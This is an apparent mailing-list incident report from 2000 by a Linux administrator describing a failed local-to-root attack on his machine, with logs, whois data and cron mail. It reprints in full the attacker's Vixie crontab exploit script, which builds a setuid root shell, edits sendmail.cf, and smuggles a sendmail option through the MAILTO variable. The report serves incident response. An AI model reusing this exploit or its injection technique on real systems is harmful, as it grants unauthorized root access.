Security Incidents: Got cracked/attacked this morning

From: Filip M. Gieszczykiewicz <filipg_at_CORONA.EPS.PITT.EDU>
Date: Sat, 8 Jan 2000 23:35:20 -0500

Howdy. Got attacked but a 'local user -> root' exploit
failed. Here're the details:

As soon as I saw the crond e-mail I su'ed in and
ran a safe'ed[*] copy of shutdown -h now on the machine.
Not needed(?).

Machine runs Linux, 2-2-13, with patched RH6.1 and latest
security rpm's installed. Not too much enabled.

Cracker came from: (they're getting a copy of this BTW)
----------------- ----------------- -----------------
Name: mel-0212-234.ports.iprimus.net.au
Address: 203.134.25.234

domain: iprimus.net.au
descr: iprimus (ACN: VICB1429660R)
Level 3 55 king st
Melbourne Victoria 3000
admin-c: TP383-AU
tech-c: TP383-AU
zone-c: TP383-AU
nserver: ns0.primus.com.au
nserver: ns1.primus.com.au
notify: dbmon_at_connect.com.au
changed: net-au-admin_at_connect.com.au 19991221
source: CCAIR

whois -h whois.aunic.net -p 43 -s AUNIC -T p
----------------- ----------------- -----------------

Mail message from cron: (recreation,snipped)
----------------- ----------------- -----------------
Date: Sat, 8 Jan 2000 21:59:00 -0500
Subject: Cron <filipg_at_host> ls
X-Cron-Env: <MAILTO=-C/tmp/sendmail.cf filipg>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/home/filipg>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=filipg>

Desktop
GROUPS.gz
News
bin
crond.sh
from_geoclub
lynx_bookmarks.html
mail
private
public
public_html
wwwis
----------------- ----------------- -----------------

Home of user contains a file:
----------------- ----------------- -----------------
-rwxrwxr-x 1 filipg filipg 2103 Jan 8 05:40 /home/filipg/crond.sh
----------------- ----------------- -----------------

Listing of exploit:
----------------- ----------------- -----------------
#!/bin/sh

# Vixie crontab exploit
#
# Local user can gain root access.
#
# Tested redhat linux : 4.2, 5.0, 5.1, 6.0
# Tested vixie crontab version : 3.0.1
#
# This program is only for demonstrative use only.
# USE IT AT YOUR OWN RISK!
#
# Programmed by Taeho Oh 1999/08/31
#
# Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
# PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
# PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug

PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH

echo
echo "Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara"
echo "PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus"
echo "PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug"
echo

echo make shell
echo
cat > /tmp/sh.c << EOF
#include<unistd.h>
#include<stdlib.h>
int main()
{
        setuid(0);
        setgid(0);
        execl("/bin/sh","sh",0);
        return 0;
}
EOF
echo compile shell
echo
cc -o /tmp/sh /tmp/sh.c || gcc -o /tmp/sh /tmp/sh.c

echo make execute shell script
echo
cat > /tmp/makesh << EOF
#!/bin/sh
chown root /tmp/sh
chgrp root /tmp/sh
chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/makesh

echo hack sendmail.cf
echo
cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1
sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf
sed 's/P=\/usr\/bin\/procmail/P=\/tmp\/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2
sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3
cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf
rm -f /tmp/sendmail.cf.tmp1
rm -f /tmp/sendmail.cf.tmp2
rm -f /tmp/sendmail.cf.tmp3

echo make cron file
echo
cat > /tmp/cronfile << EOF
MAILTO=-C/tmp/sendmail.cf `whoami`
* * * * * ls
EOF
echo input cron file
echo
crontab /tmp/cronfile

echo wait for 1 minute
echo
sec=`date +%S`
wait=`expr 65 - $sec`
sleep $wait

echo execute shell
echo
/tmp/sh

echo delete data files
echo
cd /tmp
rm -f sendmail.cf cronfile makesh sh.c
crontab /dev/null
----------------- ----------------- -----------------

Diff of fake sendmail.cf vs original:
----------------- ----------------- -----------------
/home/filipg> diff /tmp/sendmail.cf /etc/sendmail.cf
1072,1073c1072,1073
< Mprocmail, P=/tmp/makesh, F=DFMSPhnu9, S=11/31, R=21/31, T=DNS/RFC822/X-Unix,
< A=makesh -Y -m $h $f $u

---
> Mprocmail,    P=/usr/bin/procmail, F=DFMSPhnu9, S=11/31, R=21/31, T=DNS/RFC822/X-Unix,
>               A=procmail -Y -m $h $f $u
1174c1174
< Mlocal,               P=/tmp/makesh, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,
---
> Mlocal,               P=/usr/bin/procmail, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,
1176c1176
<               A=makesh -Y -a $h -d $u
---
>               A=procmail -Y -a $h -d $u
----------------- ----------------- -----------------
/tmp/cronfile has:
----------------- ----------------- -----------------
MAILTO=-C/tmp/sendmail.cf filipg
* * * * * ls
----------------- ----------------- -----------------
I did a search for 'it' and found ??? (old,c):
----------------- ----------------- -----------------
http://www.insecure.org/sploits_linux.html
----------------- ----------------- -----------------
Shell file in /tmp:
----------------- ----------------- -----------------
-rwxrwxr-x   1 filipg   filipg      11923 Jan  8 21:58 sh
/tmp/sh: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically
linked (uses shared libs), not stripped
----------------- ----------------- -----------------
Entries from /var/log/secure:
----------------- ----------------- -----------------
[these are old.. that account was shut down when I complained]
[Don't think (???) it's related:
  http://www.allwhois.com/cgi-bin/allwhois3.cgi?dn=optusnet.com.au]
Dec 28 04:25:50 host in.telnetd[5174]: connect from wdcax6-030.dialup.optusnet.com.au
Dec 28 04:25:52 host in.ftpd[5176]: connect from wdcax6-030.dialup.optusnet.com.au
Dec 28 04:26:16 host in.telnetd[5177]: connect from wdcax6-030.dialup.optusnet.com.au
[...]
Jan  8 05:38:48 host in.telnetd[10430]: connect from mel-0212-234.ports.iprimus.net.au
Jan  8 05:39:04 host login: LOGIN ON 0 BY filipg FROM mel-0212-234.ports.iprimus.net.au
----------------- ----------------- -----------------
Got in through bash... but smart enough to switch to tcsh:
(from .bash_history)
----------------- ----------------- -----------------
dir
ls -asF
source .tcshrc
tcsh
tcsh
./crond.sh
dir
dir
whoami
----------------- ----------------- -----------------
Here's a snippet from /var/log/cron:
----------------- ----------------- -----------------
[...]
root (01/08-05:40:00-10470) CMD (   /sbin/rmmod -as)
filipg (01/08-05:40:38-10493) REPLACE (filipg)
CRON (01/08-05:41:00-10499) error (bad mailto)
filipg (01/08-05:41:00-10500) CMD (ls)
filipg (01/08-05:41:19-10525) REPLACE (filipg)
filipg (01/08-05:42:01-486) RELOAD (cron/filipg)
CRON (01/08-05:42:01-10531) error (bad mailto)
filipg (01/08-05:42:01-10532) CMD (ls)
CRON (01/08-05:43:00-10536) error (bad mailto)
filipg (01/08-05:43:00-10537) CMD (ls)
filipg (01/08-05:43:58-10541) REPLACE (filipg)
filipg (01/08-05:43:58-10543) REPLACE (filipg)
filipg (01/08-05:44:00-486) RELOAD (cron/filipg)
root (01/08-05:50:00-10545) CMD (   /sbin/rmmod -as)
[...]
----------------- ----------------- -----------------
Of *COURSE*, I had fw logging disabled at the time.
I'm still learning how all this works... Should do it
faster! GUDDAM Murphy's law.
It failed... I pretty sure (I am checking signatures now, so
far so good.) Latest fixes applied and running just the
bare-essentials+httpd.
Since my password is good, I think there is a sniffer on local net.
Only places I login to that machine is from dept machines and
from console. I trust the console... can't throw the dept very
far, FYI.
Damn. Wonder if our lovely CIS has a clue. [yawn]
Cheers,
Filip G.
[*] crypted tar of key binaries... stowed for when
quano hits slowly revolving air vanes and I'm not at
the console. I know you can find problems with dis :)

Received on Jan 10 2000